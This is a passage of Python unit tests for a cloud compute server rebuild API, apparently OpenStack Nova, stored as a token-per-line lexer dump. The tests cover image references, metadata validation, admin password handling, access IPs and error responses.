op|':'
newline|'\n'
indent|' '
name|'info'
op|'='
name|'dict'
op|'('
name|'image_href_in_call'
op|'='
name|'None'
op|')'
newline|'\n'
nl|'\n'
DECL|function|rebuild
name|'def'
name|'rebuild'
op|'('
name|'self2'
op|','
name|'context'
op|','
name|'instance'
op|','
name|'image_href'
op|','
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'info'
op|'['
string|"'image_href_in_call'"
op|']'
op|'='
name|'image_href'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get'"
op|','
nl|'\n'
name|'fakes'
op|'.'
name|'fake_instance_get'
op|'('
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'rebuild'"
op|','
name|'rebuild'
op|')'
newline|'\n'
nl|'\n'
comment|"# proper local hrefs must start with 'http://localhost/v2/'"
nl|'\n'
name|'body'
op|'='
op|'{'
nl|'\n'
string|"'rebuild'"
op|':'
op|'{'
nl|'\n'
string|"'imageRef'"
op|':'
name|'self'
op|'.'
name|'image_uuid'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'info'
op|'['
string|"'image_href_in_call'"
op|']'
op|','
name|'self'
op|'.'
name|'image_uuid'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_instance_with_image_href_uses_uuid
dedent|''
name|'def'
name|'test_rebuild_instance_with_image_href_uses_uuid'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'info'
op|'='
name|'dict'
op|'('
name|'image_href_in_call'
op|'='
name|'None'
op|')'
newline|'\n'
nl|'\n'
DECL|function|rebuild
name|'def'
name|'rebuild'
op|'('
name|'self2'
op|','
name|'context'
op|','
name|'instance'
op|','
name|'image_href'
op|','
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'info'
op|'['
string|"'image_href_in_call'"
op|']'
op|'='
name|'image_href'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get'"
op|','
nl|'\n'
name|'fakes'
op|'.'
name|'fake_instance_get'
op|'('
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'rebuild'"
op|','
name|'rebuild'
op|')'
newline|'\n'
nl|'\n'
comment|"# proper local hrefs must start with 'http://localhost/v2/'"
nl|'\n'
name|'body'
op|'='
op|'{'
nl|'\n'
string|"'rebuild'"
op|':'
op|'{'
nl|'\n'
string|"'imageRef'"
op|':'
name|'self'
op|'.'
name|'image_href'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'info'
op|'['
string|"'image_href_in_call'"
op|']'
op|','
name|'self'
op|'.'
name|'image_uuid'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_accepted_minimum_pass_disabled
dedent|''
name|'def'
name|'test_rebuild_accepted_minimum_pass_disabled'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# run with enable_instance_password disabled to verify adminPass'
nl|'\n'
comment|'# is missing from response. See lp bug 921814'
nl|'\n'
indent|' '
name|'self'
op|'.'
name|'flags'
op|'('
name|'enable_instance_password'
op|'='
name|'False'
op|')'
newline|'\n'
nl|'\n'
name|'return_server'
op|'='
name|'fakes'
op|'.'
name|'fake_instance_get'
op|'('
name|'image_ref'
op|'='
string|"'2'"
op|','
nl|'\n'
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|','
name|'host'
op|'='
string|"'fake_host'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'return_server'
op|')'
newline|'\n'
name|'self_href'
op|'='
string|"'http://localhost/v2/servers/%s'"
op|'%'
name|'FAKE_UUID'
newline|'\n'
nl|'\n'
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageRef"'
op|':'
name|'self'
op|'.'
name|'_image_href'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'robj'
op|'='
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
name|'body'
op|'='
name|'robj'
op|'.'
name|'obj'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'body'
op|'['
string|"'server'"
op|']'
op|'['
string|"'image'"
op|']'
op|'['
string|"'id'"
op|']'
op|','
string|"'2'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertNotIn'
op|'('
string|'"adminPass"'
op|','
name|'body'
op|'['
string|"'server'"
op|']'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'robj'
op|'['
string|"'location'"
op|']'
op|','
name|'self_href'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_raises_conflict_on_invalid_state
dedent|''
name|'def'
name|'test_rebuild_raises_conflict_on_invalid_state'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageRef"'
op|':'
name|'self'
op|'.'
name|'_image_href'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
DECL|function|fake_rebuild
name|'def'
name|'fake_rebuild'
op|'('
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'InstanceInvalidState'
op|'('
name|'attr'
op|'='
string|"'fake_attr'"
op|','
nl|'\n'
name|'state'
op|'='
string|"'fake_state'"
op|','
name|'method'
op|'='
string|"'fake_method'"
op|','
nl|'\n'
name|'instance_uuid'
op|'='
string|"'fake'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'rebuild'"
op|','
name|'fake_rebuild'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPConflict'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_accepted_with_metadata
dedent|''
name|'def'
name|'test_rebuild_accepted_with_metadata'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'metadata'
op|'='
op|'{'
string|"'new'"
op|':'
string|"'metadata'"
op|'}'
newline|'\n'
nl|'\n'
name|'return_server'
op|'='
name|'fakes'
op|'.'
name|'fake_instance_get'
op|'('
name|'metadata'
op|'='
name|'metadata'
op|','
nl|'\n'
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|','
name|'host'
op|'='
string|"'fake_host'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'return_server'
op|')'
newline|'\n'
nl|'\n'
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageRef"'
op|':'
name|'self'
op|'.'
name|'_image_href'
op|','
nl|'\n'
string|'"metadata"'
op|':'
name|'metadata'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'body'
op|'='
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
nl|'\n'
name|'body'
op|'='
name|'body'
op|')'
op|'.'
name|'obj'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'body'
op|'['
string|"'server'"
op|']'
op|'['
string|"'metadata'"
op|']'
op|','
name|'metadata'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_accepted_with_bad_metadata
dedent|''
name|'def'
name|'test_rebuild_accepted_with_bad_metadata'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageRef"'
op|':'
name|'self'
op|'.'
name|'_image_href'
op|','
nl|'\n'
string|'"metadata"'
op|':'
string|'"stack"'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'self'
op|'.'
name|'validation_error'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_with_too_large_metadata
dedent|''
name|'def'
name|'test_rebuild_with_too_large_metadata'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageRef"'
op|':'
name|'self'
op|'.'
name|'_image_href'
op|','
nl|'\n'
string|'"metadata"'
op|':'
op|'{'
nl|'\n'
number|'256'
op|'*'
string|'"k"'
op|':'
string|'"value"'
nl|'\n'
op|'}'
nl|'\n'
op|'}'
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'self'
op|'.'
name|'request_too_large_error'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|','
name|'self'
op|'.'
name|'req'
op|','
nl|'\n'
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_bad_entity
dedent|''
name|'def'
name|'test_rebuild_bad_entity'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageId"'
op|':'
name|'self'
op|'.'
name|'_image_href'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'self'
op|'.'
name|'validation_error'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_admin_pass
dedent|''
name|'def'
name|'test_rebuild_admin_pass'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return_server'
op|'='
name|'fakes'
op|'.'
name|'fake_instance_get'
op|'('
name|'image_ref'
op|'='
string|"'2'"
op|','
nl|'\n'
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|','
name|'host'
op|'='
string|"'fake_host'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'return_server'
op|')'
newline|'\n'
nl|'\n'
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageRef"'
op|':'
name|'self'
op|'.'
name|'_image_href'
op|','
nl|'\n'
string|'"adminPass"'
op|':'
string|'"asdf"'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'body'
op|'='
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
nl|'\n'
name|'body'
op|'='
name|'body'
op|')'
op|'.'
name|'obj'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'body'
op|'['
string|"'server'"
op|']'
op|'['
string|"'image'"
op|']'
op|'['
string|"'id'"
op|']'
op|','
string|"'2'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'body'
op|'['
string|"'server'"
op|']'
op|'['
string|"'adminPass'"
op|']'
op|','
string|"'asdf'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_admin_pass_pass_disabled
dedent|''
name|'def'
name|'test_rebuild_admin_pass_pass_disabled'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# run with enable_instance_password disabled to verify adminPass'
nl|'\n'
comment|'# is missing from response. See lp bug 921814'
nl|'\n'
indent|' '
name|'self'
op|'.'
name|'flags'
op|'('
name|'enable_instance_password'
op|'='
name|'False'
op|')'
newline|'\n'
nl|'\n'
name|'return_server'
op|'='
name|'fakes'
op|'.'
name|'fake_instance_get'
op|'('
name|'image_ref'
op|'='
string|"'2'"
op|','
nl|'\n'
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|','
name|'host'
op|'='
string|"'fake_host'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'return_server'
op|')'
newline|'\n'
nl|'\n'
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageRef"'
op|':'
name|'self'
op|'.'
name|'_image_href'
op|','
nl|'\n'
string|'"adminPass"'
op|':'
string|'"asdf"'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'body'
op|'='
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
nl|'\n'
name|'body'
op|'='
name|'body'
op|')'
op|'.'
name|'obj'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'body'
op|'['
string|"'server'"
op|']'
op|'['
string|"'image'"
op|']'
op|'['
string|"'id'"
op|']'
op|','
string|"'2'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertNotIn'
op|'('
string|"'adminPass'"
op|','
name|'body'
op|'['
string|"'server'"
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_server_not_found
dedent|''
name|'def'
name|'test_rebuild_server_not_found'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
DECL|function|server_not_found
indent|' '
name|'def'
name|'server_not_found'
op|'('
name|'self'
op|','
name|'instance_id'
op|','
nl|'\n'
name|'columns_to_join'
op|'='
name|'None'
op|','
name|'use_slave'
op|'='
name|'False'
op|')'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'InstanceNotFound'
op|'('
name|'instance_id'
op|'='
name|'instance_id'
op|')'
newline|'\n'
dedent|''
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'server_not_found'
op|')'
newline|'\n'
nl|'\n'
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageRef"'
op|':'
name|'self'
op|'.'
name|'_image_href'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPNotFound'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_with_bad_image
dedent|''
name|'def'
name|'test_rebuild_with_bad_image'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageRef"'
op|':'
string|'"foo"'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPBadRequest'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_accessIP
dedent|''
name|'def'
name|'test_rebuild_accessIP'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'attributes'
op|'='
op|'{'
nl|'\n'
string|"'access_ip_v4'"
op|':'
string|"'172.19.0.1'"
op|','
nl|'\n'
string|"'access_ip_v6'"
op|':'
string|"'fe80::1'"
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageRef"'
op|':'
name|'self'
op|'.'
name|'_image_href'
op|','
nl|'\n'
string|'"accessIPv4"'
op|':'
string|'"172.19.0.1"'
op|','
nl|'\n'
string|'"accessIPv6"'
op|':'
string|'"fe80::1"'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'data'
op|'='
op|'{'
string|"'changes'"
op|':'
op|'{'
op|'}'
op|'}'
newline|'\n'
name|'orig_get'
op|'='
name|'compute_api'
op|'.'
name|'API'
op|'.'
name|'get'
newline|'\n'
nl|'\n'
DECL|function|wrap_get
name|'def'
name|'wrap_get'
op|'('
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'data'
op|'['
string|"'instance'"
op|']'
op|'='
name|'orig_get'
op|'('
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
newline|'\n'
name|'return'
name|'data'
op|'['
string|"'instance'"
op|']'
newline|'\n'
nl|'\n'
DECL|function|fake_save
dedent|''
name|'def'
name|'fake_save'
op|'('
name|'context'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'data'
op|'['
string|"'changes'"
op|']'
op|'.'
name|'update'
op|'('
name|'data'
op|'['
string|"'instance'"
op|']'
op|'.'
name|'obj_get_changes'
op|'('
op|')'
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'get'"
op|','
name|'wrap_get'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'objects'
op|'.'
name|'Instance'
op|','
string|"'save'"
op|','
name|'fake_save'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'_image_href'
op|','
name|'data'
op|'['
string|"'changes'"
op|']'
op|'['
string|"'image_ref'"
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|'""'
op|','
name|'data'
op|'['
string|"'changes'"
op|']'
op|'['
string|"'kernel_id'"
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|'""'
op|','
name|'data'
op|'['
string|"'changes'"
op|']'
op|'['
string|"'ramdisk_id'"
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'task_states'
op|'.'
name|'REBUILDING'
op|','
name|'data'
op|'['
string|"'changes'"
op|']'
op|'['
string|"'task_state'"
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'0'
op|','
name|'data'
op|'['
string|"'changes'"
op|']'
op|'['
string|"'progress'"
op|']'
op|')'
newline|'\n'
name|'for'
name|'attr'
op|','
name|'value'
name|'in'
name|'attributes'
op|'.'
name|'items'
op|'('
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'value'
op|','
name|'str'
op|'('
name|'data'
op|'['
string|"'changes'"
op|']'
op|'['
name|'attr'
op|']'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_when_kernel_not_exists
dedent|''
dedent|''
name|'def'
name|'test_rebuild_when_kernel_not_exists'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
nl|'\n'
DECL|function|return_image_meta
indent|' '
name|'def'
name|'return_image_meta'
op|'('
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'image_meta_table'
op|'='
op|'{'
nl|'\n'
string|"'2'"
op|':'
op|'{'
string|"'id'"
op|':'
number|'2'
op|','
string|"'status'"
op|':'
string|"'active'"
op|','
string|"'container_format'"
op|':'
string|"'ari'"
op|'}'
op|','
nl|'\n'
string|"'155d900f-4e14-4e4c-a73d-069cbf4541e6'"
op|':'
nl|'\n'
op|'{'
string|"'id'"
op|':'
number|'3'
op|','
string|"'status'"
op|':'
string|"'active'"
op|','
string|"'container_format'"
op|':'
string|"'raw'"
op|','
nl|'\n'
string|"'properties'"
op|':'
op|'{'
string|"'kernel_id'"
op|':'
number|'1'
op|','
string|"'ramdisk_id'"
op|':'
number|'2'
op|'}'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
name|'image_id'
op|'='
name|'args'
op|'['
number|'2'
op|']'
newline|'\n'
name|'try'
op|':'
newline|'\n'
indent|' '
name|'image_meta'
op|'='
name|'image_meta_table'
op|'['
name|'str'
op|'('
name|'image_id'
op|')'
op|']'
newline|'\n'
dedent|''
name|'except'
name|'KeyError'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'ImageNotFound'
op|'('
name|'image_id'
op|'='
name|'image_id'
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'return'
name|'image_meta'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'fake'
op|'.'
name|'_FakeImageService'
op|','
string|"'show'"
op|','
name|'return_image_meta'
op|')'
newline|'\n'
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageRef"'
op|':'
string|'"155d900f-4e14-4e4c-a73d-069cbf4541e6"'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPBadRequest'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rebuild_proper_kernel_ram
dedent|''
name|'def'
name|'test_rebuild_proper_kernel_ram'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'instance_meta'
op|'='
op|'{'
string|"'kernel_id'"
op|':'
name|'None'
op|','
string|"'ramdisk_id'"
op|':'
name|'None'
op|'}'
newline|'\n'
nl|'\n'
name|'orig_get'
op|'='
name|'compute_api'
op|'.'
name|'API'
op|'.'
name|'get'
newline|'\n'
nl|'\n'
DECL|function|wrap_get
name|'def'
name|'wrap_get'
op|'('
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'inst'
op|'='
name|'orig_get'
op|'('
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
newline|'\n'
name|'instance_meta'
op|'['
string|"'instance'"
op|']'
op|'='
name|'inst'
newline|'\n'
name|'return'
name|'inst'
newline|'\n'
nl|'\n'
DECL|function|fake_save
dedent|''
name|'def'
name|'fake_save'
op|'('
name|'context'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'instance'
op|'='
name|'instance_meta'
op|'['
string|"'instance'"
op|']'
newline|'\n'
name|'for'
name|'key'
name|'in'
name|'instance_meta'
op|'.'
name|'keys'
op|'('
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'key'
name|'in'
name|'instance'
op|'.'
name|'obj_what_changed'
op|'('
op|')'
op|':'
newline|'\n'
indent|' '
name|'instance_meta'
op|'['
name|'key'
op|']'
op|'='
name|'instance'
op|'['
name|'key'
op|']'
newline|'\n'
nl|'\n'
DECL|function|return_image_meta
dedent|''
dedent|''
dedent|''
name|'def'
name|'return_image_meta'
op|'('
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'image_meta_table'
op|'='
op|'{'
nl|'\n'
string|"'1'"
op|':'
op|'{'
string|"'id'"
op|':'
number|'1'
op|','
string|"'status'"
op|':'
string|"'active'"
op|','
string|"'container_format'"
op|':'
string|"'aki'"
op|'}'
op|','
nl|'\n'
string|"'2'"
op|':'
op|'{'
string|"'id'"
op|':'
number|'2'
op|','
string|"'status'"
op|':'
string|"'active'"
op|','
string|"'container_format'"
op|':'
string|"'ari'"
op|'}'
op|','
nl|'\n'
string|"'155d900f-4e14-4e4c-a73d-069cbf4541e6'"
op|':'
nl|'\n'
op|'{'
string|"'id'"
op|':'
number|'3'
op|','
string|"'status'"
op|':'
string|"'active'"
op|','
string|"'container_format'"
op|':'
string|"'raw'"
op|','
nl|'\n'
string|"'properties'"
op|':'
op|'{'
string|"'kernel_id'"
op|':'
number|'1'
op|','
string|"'ramdisk_id'"
op|':'
number|'2'
op|'}'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
name|'image_id'
op|'='
name|'args'
op|'['
number|'2'
op|']'
newline|'\n'
name|'try'
op|':'
newline|'\n'
indent|' '
name|'image_meta'
op|'='
name|'image_meta_table'
op|'['
name|'str'
op|'('
name|'image_id'
op|')'
op|']'
newline|'\n'
dedent|''
name|'except'
name|'KeyError'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'ImageNotFound'
op|'('
name|'image_id'
op|'='
name|'image_id'
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'return'
name|'image_meta'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'fake'
op|'.'
name|'_FakeImageService'
op|','
string|"'show'"
op|','
name|'return_image_meta'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'get'"
op|','
name|'wrap_get'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'objects'
op|'.'
name|'Instance'
op|','
string|"'save'"
op|','
name|'fake_save'
op|')'
newline|'\n'
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageRef"'
op|':'
string|'"155d900f-4e14-4e4c-a73d-069cbf4541e6"'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
op|'.'
name|'obj'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'instance_meta'
op|'['
string|"'kernel_id'"
op|']'
op|','
string|"'1'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'instance_meta'
op|'['
string|"'ramdisk_id'"
op|']'
op|','
string|"'2'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
